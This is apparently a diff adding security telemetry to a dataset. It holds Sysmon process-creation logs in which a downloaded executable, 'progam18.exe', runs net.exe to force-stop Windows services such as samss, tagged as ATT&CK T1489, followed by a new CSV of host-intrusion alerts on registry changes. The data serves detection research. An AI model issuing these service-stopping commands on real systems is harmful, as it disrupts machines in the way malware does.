C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:26.163"",""processGuid"":""{df9fc3d3-d15e-5ec7-0000-0010809c1900}"",""processId"":""3376"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d15e-5ec7-0000-00104c941900}"",""parentProcessId"":""4540"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:37:34.495",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:26.113 +ProcessGuid: {df9fc3d3-d15e-5ec7-0000-001060981900} +ProcessId: 3476 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001099821900} +ParentProcessId: 5356 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:26.128239200Z"",""eventRecordID"":""950"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:26.113\r\nProcessGuid: {df9fc3d3-d15e-5ec7-0000-001060981900}\r\nProcessId: 3476\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001099821900}\r\nParentProcessId: 5356\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:26.113"",""processGuid"":""{df9fc3d3-d15e-5ec7-0000-001060981900}"",""processId"":""3476"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001099821900}"",""parentProcessId"":""5356"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:37:34.480",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:26.074 +ProcessGuid: {df9fc3d3-d15e-5ec7-0000-00104c941900} +ProcessId: 4540 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:26.078154100Z"",""eventRecordID"":""949"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:26.074\r\nProcessGuid: {df9fc3d3-d15e-5ec7-0000-00104c941900}\r\nProcessId: 4540\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:26.074"",""processGuid"":""{df9fc3d3-d15e-5ec7-0000-00104c941900}"",""processId"":""4540"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:37:34.457",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:25.860 +ProcessGuid: {df9fc3d3-d15d-5ec7-0000-001099821900} +ProcessId: 5356 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:25.897778800Z"",""eventRecordID"":""948"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:25.860\r\nProcessGuid: {df9fc3d3-d15d-5ec7-0000-001099821900}\r\nProcessId: 5356\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:25.860"",""processGuid"":""{df9fc3d3-d15d-5ec7-0000-001099821900}"",""processId"":""5356"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" diff --git a/data/MW_19_HIDS_1.csv b/data/MW_19_HIDS_1.csv new file mode 100644 index 0000000..ee90139 --- /dev/null +++ b/data/MW_19_HIDS_1.csv 
@@ -0,0 +1,375 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 6, 2020 @ 08:44:28.387",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)", +"Apr 6, 2020 @ 08:44:25.012",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'", +"Apr 6, 2020 @ 08:43:17.166",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '93c2f688a68bea92ca0316b543b731f9' +New md5sum is : 'b0b97338469d0e4b1f413fb4b548b967' +Old sha1sum was: '562310fa74b7d8dc4147b75600dba6658f8f1bc8' +New sha1sum is : '7ccab140b78da4c4fffa98afdc0dad438217f06e' +" +"Apr 6, 2020 @ 08:43:17.151",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'a0df8d6e879d924da3288b2aa0b85114' +New md5sum is : '8084f544981f665891455fa614c559c8' +Old sha1sum was: '5b3369bb152c26552a26be399f0ea043686a36fe' +New sha1sum is : '6879876f2270cbe6cf155dc44930db270fbb0d41' +" +"Apr 6, 2020 @ 08:43:13.683",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2af29' was added. +" +"Apr 6, 2020 @ 08:43:13.667",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:43:06.824",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. 
+Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : '729d0877659e4797d3983fddb4576047' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '109945df285ffff37e08eaab1d91e55cb59c26c8' +" +"Apr 6, 2020 @ 08:43:06.776",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'c0405481b74cf6174a880af1ccc1d4b0' +New md5sum is : 'a95a4c0a8e5f7b405ff8eb5c4b437bc5' +Old sha1sum was: 'b7d4bb4d3cde4fa21584725503c78a8e4d7d6788' +New sha1sum is : 'da15a1a2d8cc2b5edf6ac520096edd2d505a36a6' +" +"Apr 6, 2020 @ 08:43:06.760",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '3bed6b4b8101da842bb6afe04a8271c2' +New md5sum is : 'eb74d772fb247effed22679195324ed4' +Old sha1sum was: '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +New sha1sum is : 'ede60f5480a0a2f75b669872a6b32a27d174730b' +" +"Apr 6, 2020 @ 08:43:06.027",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: 'a6934418b12b085c34f2dbaa9e9fa7a0' +New md5sum is : '36e6a5b67014cb81a360a5f2a9e804df' +Old sha1sum was: 'd9336cc746599b17846d9aa0e03da9cf70d1f3b7' +New sha1sum is : 'ccf4c3faa9df7387844fd44d8215f29ce5a05d82' +" +"Apr 6, 2020 @ 08:43:04.682",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : '5b06acdc8ed6732e0719fab302999091' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : 'a4fa3b6743a44afa0d4ad52e2b3d1fc14c834bde' +" +"Apr 6, 2020 @ 08:43:04.432",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'b132e65b4963a54ebee91bcab8914621' +New md5sum is : '61f3946e9ba274598130f5d593a8ba6d' +Old sha1sum was: '744e1fde2f3ae486cbff69a205e315e1c2f088e3' +New sha1sum is : '728202215cd7499d863da7b762352efe5c25a4af' +" +"Apr 6, 2020 @ 08:43:03.869",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2af29' was added. +" +"Apr 6, 2020 @ 08:43:03.854",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:43:03.729",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: 'f6949813e6b9d992278b95b7f209e047' +New md5sum is : '13761060e702fe0b2aa32f46d7d75863' +Old sha1sum was: '8db1fc943f83c30b4bc07f1ed394492c392e7722' +New sha1sum is : '1ad862be5c095dacfc993e3834d975af6909452f' +" +"Apr 6, 2020 @ 08:43:03.510",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '342765c52f3fd7b50e5188adb30a0ede' +New md5sum is : 'a831ea2c98f083cbaf2c24795ba188c6' +Old sha1sum was: '6d803f7cc7de0ae861402e45b8a1442595a4b544' +New sha1sum is : '6d6612e0d9bdeb41b67a06af336d0f8a6571cd4d' +" +"Apr 6, 2020 @ 08:43:03.088",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2af29' was added. +" +"Apr 6, 2020 @ 08:43:03.072",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:43:02.526",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. 
+Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : '5b06acdc8ed6732e0719fab302999091' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : 'a4fa3b6743a44afa0d4ad52e2b3d1fc14c834bde' +" +"Apr 6, 2020 @ 08:43:00.603",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'bb30a4865d0fe96a2d7b53b843e8fa0a' +New md5sum is : '5478e7278a1f89c75335d7fd8f30e597' +Old sha1sum was: '98ca91600e4060c62dc2cc91468e632c4fdc3ef6' +New sha1sum is : '0f7abad7f06c8fcae527dd315e0f53fd7d6ea74d' +" +"Apr 6, 2020 @ 08:42:55.166",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 08:42:55.150",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +" +"Apr 6, 2020 @ 08:42:52.963",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : '671078222c6f28f8a987ef233af7d5a5' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'c62d69328b5a046dd8494e6a38df8074f8310102' +" +"Apr 6, 2020 @ 08:42:52.948",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. 
+Old md5sum was: '728627011eedd28411cf4e1f2a30d1ca' +New md5sum is : 'e7da235d7443b87ea4d5d1ef32857357' +Old sha1sum was: '26576187b3bbee39309e7ebe95de85749ea7b9d2' +New sha1sum is : 'c355c6c799dda0b3767d88f9d370687b8dcadb06' +" +"Apr 6, 2020 @ 08:42:48.526",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +" +"Apr 6, 2020 @ 08:42:46.620",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2af29' was added. +" +"Apr 6, 2020 @ 08:42:46.603",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:42:46.058",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2af29' was added. +" +"Apr 6, 2020 @ 08:42:46.041",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:42:44.370",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2af29' was added. +" +"Apr 6, 2020 @ 08:42:44.354",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:42:41.714",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. 
+Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '6b263e7f7f9f5df60b5ba6c86e1d3e84' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '2b734daaadaeb6ce4fae48d91f5494165ca31e14' +" +"Apr 6, 2020 @ 08:42:40.057",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: 'b86fbb8c7365f0cd160fe1dd1a4e4de8' +New md5sum is : '45b4950ff29c20f4bd9965865008a1c3' +Old sha1sum was: 'f01eba6dbe74107285007351b77304e1a19bc18e' +New sha1sum is : '47513d7b2f94ec1a09f92dd2777575f49cdf29e6' +" +"Apr 6, 2020 @ 08:42:39.119",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'a22f4624fc957eb22f371c4f482524df' +New md5sum is : '2ef8853d6fca9c24a1d8a1179df3b366' +Old sha1sum was: '432b869a738326466b200cc25be6d8307cfdc040' +New sha1sum is : '40faabdd2e3085b497da125adc67a00f205fe003' +" +"Apr 6, 2020 @ 08:42:38.979",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2af29' was added. +" +"Apr 6, 2020 @ 08:42:38.963",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2af29\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 08:42:38.948",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:42:33.759",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. 
+Old md5sum was: 'bad2d92e8c5f76681c68068d36d9f8de' +New md5sum is : '1ebdcefac825fba82f9e97f61638e395' +Old sha1sum was: 'a72e7b39c1d81678ec13d5d1bb05ce48683f8df2' +New sha1sum is : 'ead23002ea63c0d0ea482df90c6c02d8f9441dd7' +" +"Apr 6, 2020 @ 08:42:32.431",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '6b263e7f7f9f5df60b5ba6c86e1d3e84' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '2b734daaadaeb6ce4fae48d91f5494165ca31e14' +" +"Apr 6, 2020 @ 08:42:29.931",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '3879a39655c450780e274d024098bdb5' +New md5sum is : 'b0817392d21e4502332baa716499c3bb' +Old sha1sum was: '8d6f073ffa5ccb93f82238394c9d0c663088a3db' +New sha1sum is : 'fd4a4426a40a883487f3cc1d0bf3aafba0d91dff' +" +"Apr 6, 2020 @ 08:42:29.369",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '6b263e7f7f9f5df60b5ba6c86e1d3e84' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '2b734daaadaeb6ce4fae48d91f5494165ca31e14' +" +"Apr 6, 2020 @ 08:42:28.228",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. 
+Old md5sum was: '8babdce3ab05d3473a80df927d06237f'
+New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9'
+Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3'
+New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52'
+"
+"Apr 6, 2020 @ 08:42:25.901",3,"Windows Logon Success",
+"Apr 6, 2020 @ 08:42:24.510",3,"Software Protection service scheduled successfully",
